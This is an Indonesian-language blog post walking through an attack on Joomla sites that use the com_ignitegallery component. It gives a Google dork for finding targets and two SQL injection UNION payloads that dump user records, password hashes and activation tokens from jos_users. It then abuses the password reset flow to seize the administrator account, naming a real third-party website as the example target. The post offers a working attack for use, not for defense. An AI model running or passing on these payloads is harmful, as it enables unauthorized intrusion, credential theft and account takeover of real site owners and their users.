Exploit Joomla option=com_ignitegallery
======
=step1=
======
coba kita cari di google dengan dork ini :
inurl:"index.php option=com_ignitegallery"
======
=step2=
======
pasang exploitnya
exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
contoh :
http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--
nah muncul kan tuh :D
======
=step3=
======
coba kita reset password nya
sekarang kita reset password dengan menggunakan exploit ini :
/index.php?option=com_user&view=reset
hm.. minta email dia.. masukin aja email admin tadi..
enter deh :D
======
=step4=
======
wah minta activation pula, tenang kita cari dulu
activationnya :D
exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--
tuh kan kluar activatifasinya :D
======
=step5=
======
copas aja ke yang tadi lalu enter :D
======
=step6=
======
sekarang meminta password baru :D
======
=step7=
======
oke langsung ke taham berikutnya, sekarang kita masuk ke
adminnya
http://www.kaikourafishing.co.nz/administrator/
0 comments:
Post a Comment